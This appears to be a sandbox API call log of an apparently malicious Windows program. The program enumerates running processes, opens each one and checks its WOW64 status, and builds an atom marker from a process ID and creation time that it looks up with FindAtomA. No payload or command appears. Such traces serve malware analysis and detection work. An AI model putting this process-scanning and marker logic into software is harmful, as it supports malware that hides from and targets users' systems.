	[0074.757] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.757] CloseHandle (hObject=0x224) returned 1
	[0074.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x728958, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0074.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0074.757] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.757] CloseHandle (hObject=0x224) returned 1
	[0074.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x7721b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0074.757] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.757] CloseHandle (hObject=0x224) returned 1
	[0074.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x772188, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0074.758] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.758] CloseHandle (hObject=0x224) returned 1
	[0074.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72ea18, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0074.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0074.758] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.758] CloseHandle (hObject=0x224) returned 1
	[0074.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x772188, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0074.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0074.758] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.758] CloseHandle (hObject=0x224) returned 1
	[0074.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x772218, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0074.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0074.758] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.758] CloseHandle (hObject=0x224) returned 1
	[0074.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x728858, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0074.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0074.758] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.758] CloseHandle (hObject=0x224) returned 1
	[0074.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x772158, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0074.759] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.759] CloseHandle (hObject=0x224) returned 1
	[0074.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x728838, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0074.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0074.759] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.759] CloseHandle (hObject=0x224) returned 1
	[0074.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72e860, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0074.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0074.759] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.759] CloseHandle (hObject=0x224) returned 1
	[0074.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72eab8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0074.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0074.759] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.759] CloseHandle (hObject=0x224) returned 1
	[0074.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x772200, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0074.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0074.759] GetLastError () returned 0x5
	[0074.759] GetLastError () returned 0x5
	[0074.760] GetLastError () returned 0x5
	[0074.760] GetLastError () returned 0x5
	[0074.760] GetLastError () returned 0x5
	[0074.760] GetLastError () returned 0x5
	[0074.760] GetLastError () returned 0x5
	[0074.760] GetLastError () returned 0x5
	[0074.760] GetLastError () returned 0x5
	[0074.760] GetLastError () returned 0x5
	[0074.760] GetLastError () returned 0x5
	[0074.760] GetLastError () returned 0x5
	[0074.760] GetLastError () returned 0x5
	[0074.760] GetLastError () returned 0x5
	[0074.760] GetLastError () returned 0x5
	[0074.760] GetLastError () returned 0x5
	[0074.760] GetLastError () returned 0x5
	[0074.760] GetLastError () returned 0x5
	[0074.760] GetLastError () returned 0x5
	[0074.760] GetLastError () returned 0x5
	[0074.760] GetLastError () returned 0x5
	[0074.760] GetLastError () returned 0x5
	[0074.760] GetLastError () returned 0x5
	[0074.760] GetLastError () returned 0x5
	[0074.760] GetLastError () returned 0x5
	[0074.760] GetLastError () returned 0x5
	[0074.760] GetLastError () returned 0x5
	[0074.760] GetLastError () returned 0x5
	[0074.760] GetLastError () returned 0x5
	[0074.760] GetLastError () returned 0x5
	[0074.760] GetLastError () returned 0x5
	[0074.760] GetLastError () returned 0x5
	[0074.760] GetLastError () returned 0x5
	[0074.760] GetLastError () returned 0x5
	[0074.761] GetLastError () returned 0x5
	[0074.761] GetLastError () returned 0x5
	[0074.761] GetLastError () returned 0x5
	[0074.761] GetLastError () returned 0x5
	[0074.761] GetLastError () returned 0x5
	[0074.761] GetLastError () returned 0x5
	[0074.761] GetLastError () returned 0x5
	[0074.761] GetLastError () returned 0x5
	[0074.761] GetLastError () returned 0x5
	[0074.761] GetLastError () returned 0x5
	[0074.761] GetLastError () returned 0x5
	[0074.761] GetLastError () returned 0x5
	[0074.761] GetLastError () returned 0x5
	[0074.761] GetLastError () returned 0x5
	[0074.761] GetLastError () returned 0x5
	[0074.761] GetLastError () returned 0x5
	[0074.761] GetLastError () returned 0x5
	[0074.761] GetLastError () returned 0x5
	[0074.761] GetLastError () returned 0x5
	[0074.761] GetLastError () returned 0x5
	[0074.761] GetLastError () returned 0x5
	[0074.761] GetLastError () returned 0x5
	[0074.761] GetLastError () returned 0x5
	[0074.762] GetLastError () returned 0x5
	[0074.762] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0074.762] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0074.762] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0074.762] GetLastError () returned 0x5
	[0074.763] GetLastError () returned 0x5
	[0074.763] GetLastError () returned 0x5
	[0074.763] GetLastError () returned 0x5
	[0074.763] GetLastError () returned 0x5
	[0074.763] GetLastError () returned 0x5
	[0074.763] GetLastError () returned 0x5
	[0074.763] GetLastError () returned 0x5
	[0074.763] GetLastError () returned 0x5
	[0074.763] GetLastError () returned 0x5
	[0074.763] GetLastError () returned 0x5
	[0074.763] GetLastError () returned 0x5
	[0074.763] GetLastError () returned 0x5
	[0074.763] GetLastError () returned 0x5
	[0074.763] GetLastError () returned 0x5
	[0074.764] GetLastError () returned 0x5
	[0074.764] GetLastError () returned 0x5
	[0074.764] GetLastError () returned 0x5
	[0074.764] GetLastError () returned 0x5
	[0074.764] GetLastError () returned 0x5
	[0074.764] GetLastError () returned 0x5
	[0074.764] GetLastError () returned 0x5
	[0074.764] GetLastError () returned 0x5
	[0074.764] GetLastError () returned 0x5
	[0074.764] GetLastError () returned 0x5
	[0074.764] GetLastError () returned 0x5
	[0074.764] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0074.764] GetLastError () returned 0x5
	[0074.765] GetLastError () returned 0x5
	[0074.765] GetLastError () returned 0x5
	[0074.765] GetLastError () returned 0x5
	[0074.765] GetLastError () returned 0x5
	[0074.765] GetLastError () returned 0x5
	[0074.765] GetLastError () returned 0x5
	[0074.765] GetLastError () returned 0x5
	[0074.765] GetLastError () returned 0x5
	[0074.765] GetLastError () returned 0x5
	[0074.765] GetLastError () returned 0x5
	[0074.765] GetLastError () returned 0x5
	[0074.765] GetLastError () returned 0x5
	[0074.765] GetLastError () returned 0x5
	[0074.765] GetLastError () returned 0x5
	[0074.765] GetLastError () returned 0x5
	[0074.765] GetLastError () returned 0x5
	[0074.765] GetLastError () returned 0x5
	[0074.765] GetLastError () returned 0x5
	[0074.765] GetLastError () returned 0x5
	[0074.765] GetLastError () returned 0x5
	[0074.765] GetLastError () returned 0x5
	[0074.765] GetLastError () returned 0x5
	[0074.765] GetLastError () returned 0x5
	[0074.765] GetLastError () returned 0x5
	[0074.765] GetLastError () returned 0x5
	[0074.766] GetLastError () returned 0x5
	[0074.766] GetLastError () returned 0x5
	[0074.766] GetLastError () returned 0x5
	[0074.766] GetLastError () returned 0x5
	[0074.766] GetLastError () returned 0x5
	[0074.766] GetLastError () returned 0x5
	[0074.766] GetLastError () returned 0x5
	[0074.766] GetLastError () returned 0x5
	[0074.766] GetLastError () returned 0x5
	[0074.766] GetLastError () returned 0x5
	[0074.766] GetLastError () returned 0x5
	[0074.766] GetLastError () returned 0x5
	[0074.766] GetLastError () returned 0x5
	[0074.766] GetLastError () returned 0x5
	[0074.766] GetLastError () returned 0x5
	[0074.766] GetLastError () returned 0x5
	[0074.766] GetLastError () returned 0x5
	[0074.766] GetLastError () returned 0x5
	[0074.766] GetLastError () returned 0x5
	[0074.766] GetLastError () returned 0x5
	[0074.766] GetLastError () returned 0x5
	[0074.766] GetLastError () returned 0x5
	[0074.766] GetLastError () returned 0x5
	[0074.766] GetLastError () returned 0x5
	[0074.766] GetLastError () returned 0x5
	[0074.766] GetLastError () returned 0x5
	[0074.766] GetLastError () returned 0x5
	[0074.766] GetLastError () returned 0x5
	[0074.766] GetLastError () returned 0x5
	[0074.767] GetLastError () returned 0x5
	[0074.767] GetLastError () returned 0x5
	[0074.767] GetLastError () returned 0x5
	[0074.767] GetLastError () returned 0x5
	[0074.767] GetLastError () returned 0x5
	[0074.767] GetLastError () returned 0x5
	[0074.767] GetLastError () returned 0x5
	[0074.767] GetLastError () returned 0x5
	[0074.767] GetLastError () returned 0x5
	[0074.767] GetLastError () returned 0x5
	[0074.767] GetLastError () returned 0x5
	[0074.767] GetLastError () returned 0x5
	[0074.767] GetLastError () returned 0x5
	[0074.767] GetLastError () returned 0x5
	[0074.767] GetLastError () returned 0x5
	[0074.767] GetLastError () returned 0x5
	[0074.767] GetLastError () returned 0x5
	[0074.767] GetLastError () returned 0x5
	[0074.767] GetLastError () returned 0x5
	[0074.767] GetLastError () returned 0x5
	[0074.767] GetLastError () returned 0x5
	[0074.767] GetLastError () returned 0x5
	[0074.767] GetLastError () returned 0x5
	[0074.767] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0074.768] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0074.768] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0074.768] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0074.768] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0074.768] CloseHandle (hObject=0x224) returned 1
	[0074.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0074.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x7721b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0074.769] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.769] CloseHandle (hObject=0x224) returned 1
	[0074.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72e810, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0074.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0074.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0074.770] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.770] CloseHandle (hObject=0x224) returned 1
	[0074.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x7721b8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0074.801] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16cc8) returned 0xc0000004
	[0074.802] VirtualAlloc (lpAddress=0x0, dwSize=0x16dc8, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0074.802] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16dc8, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0074.804] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0074.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x772200, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0074.805] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0074.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772170, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.805] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0074.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.805] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0074.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772218, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.805] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0074.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.806] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0074.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x7721d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.806] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0074.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.806] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0074.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.807] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0074.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.807] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0074.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dd80, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0074.807] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0074.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.808] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0074.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.808] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0074.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.808] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0074.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.809] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0074.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.809] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0074.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.809] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0074.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.809] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0074.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0074.810] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.810] CloseHandle (hObject=0x224) returned 1
	[0074.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x7721a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0074.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0074.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0074.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x728858, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0074.811] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0074.811] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.811] CloseHandle (hObject=0x224) returned 1
	[0074.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x7287f8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0074.811] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0074.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.811] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0074.811] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.812] CloseHandle (hObject=0x224) returned 1
	[0074.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.812] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0074.812] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.812] CloseHandle (hObject=0x224) returned 1
	[0074.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x7721d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.812] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0074.812] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.812] CloseHandle (hObject=0x224) returned 1
